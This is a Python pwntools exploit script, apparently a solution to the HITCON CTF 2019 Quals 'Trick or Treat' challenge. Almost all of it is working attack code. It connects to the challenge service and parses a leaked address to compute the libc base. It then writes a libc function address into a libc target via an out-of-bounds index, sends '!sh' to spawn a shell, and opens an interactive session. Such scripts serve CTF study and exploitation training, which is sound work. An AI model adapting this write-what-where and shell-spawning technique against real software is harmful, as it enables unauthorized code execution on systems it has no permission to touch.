HITCON CTF 2019 Quals 🎃 Trick or Treat 🎃
#!/usr/bin/env python
from pwn import *
# pwntools terminal used by gdb.debug()/gdb.attach(): a horizontal tmux split.
context.update(terminal=['tmux', 'splitw', '-h'])
# context.update(terminal=['tmux', 'new-window'])  # open a new tmux window instead
# libc = ELF('')
elf = ELF('./trick_or_treat')
# OS/arch for pwntools helpers are taken from the binary itself.
context.update(os='linux', arch=elf.arch)
# Verbose I/O logging for every send/recv.
context.update(log_level='debug')

# Endpoints: the 'r' launch option uses the remote pair, 'l' the local pair.
RHOST, RPORT = "3.112.41.140", 56746
LHOST, LPORT = "127.0.0.1", 56746
def section_addr(name, elf=elf):
    """Return the ``sh_addr`` header field of ELF section *name* in *elf*.

    *elf* defaults to the module-level binary loaded above. Raises
    AttributeError if no section called *name* exists (lookup returns None).
    """
    section = elf.get_section_by_name(name)
    return section.header['sh_addr']
def dbg(ss):
    """Log ``<ss>: 0x<value>`` where *ss* names a value in this script.

    *ss* is passed to eval() inside this function, so it resolves against
    the script's globals (the calls in this file pass literal names such as
    'm' and 'libc_base'); it is a debugging aid, not a parser for external
    input.
    """
    value = eval(ss)
    log.info("{}: 0x{:x}".format(ss, value))
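conn = None
# Launch mode from the first CLI argument (consumed so the rest of argv is
# left untouched): 'r' remote service, 'l' local service, 'd' run under gdb,
# 'a' local process with gdb attached, anything else a plain local process.
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?'  # pop option
if opt in ('r', 'l'):
    # Tuple membership rather than the substring test `opt in 'rl'`:
    # an empty argument or the literal 'rl' would pass that test and then
    # raise KeyError on the dict lookup below.
    endpoints = {'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}
    conn = remote(*endpoints[opt])
elif opt == 'd':
    # The script has no placeholders, so the former .format(main address)
    # call was dead and has been dropped.
    gdbscript = """
continue
"""
    conn = gdb.debug(['./trick_or_treat'], gdbscript=gdbscript)
else:
    conn = process(['./trick_or_treat'])
    # conn = process(['./trick_or_treat'], env={'LD_PRELOAD': ''})
if opt == 'a':
    gdb.attach(conn)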
# exploit
# Interaction with the challenge service. The numeric constants used below
# (0x1f1000, 0x1f1ff0, 0x3ed8e8, 0x4f440) are fixed offsets the author chose
# for the specific binary/libc build of this challenge; they are not derived
# here and are not expected to hold for any other build -- confirm against
# the target's libc before reuse.
log.info('Pwning')
a = 0x100000
# Answer the "Size" prompt with a constant plus `a`.
conn.sendlineafter('Size', str(0x1f1000 + a))
conn.recvuntil('Magic:')
# The service prints a hex value after "Magic:"; parse it as an integer.
m = int(conn.recvline(), 16)
dbg('m')
# libc_base is computed from that value, a fixed offset, and the same `a`.
libc_base = m + 0x1f1ff0 + a
dbg('libc_base')
target = libc_base + 0x3ed8e8
#target = libc_base + 0x3ebc30
# conn.sendline(hex((target - m)/8)[2:] + ' ' + hex(libc_base + 0x10a38c)[2:])
#conn.sendline(hex((target - m)/8)[2:] + ' ' + hex(libc_base + 0x4f322)[2:])
# Sends "<index> <value>" as bare hex digits ([2:] strips the "0x" prefix).
# NOTE: `(target - m)/8` relies on Python 2 integer division; under Python 3
# it yields a float and hex() raises TypeError.
conn.sendline(hex((target - m)/8)[2:] + ' ' + hex(libc_base + 0x4f440)[2:])
conn.sendline( '2'*0x800 + ' ed')
# Short pause so the previous line is processed before the next send.
time.sleep(0.1)
conn.sendline('!sh')
conn.interactive()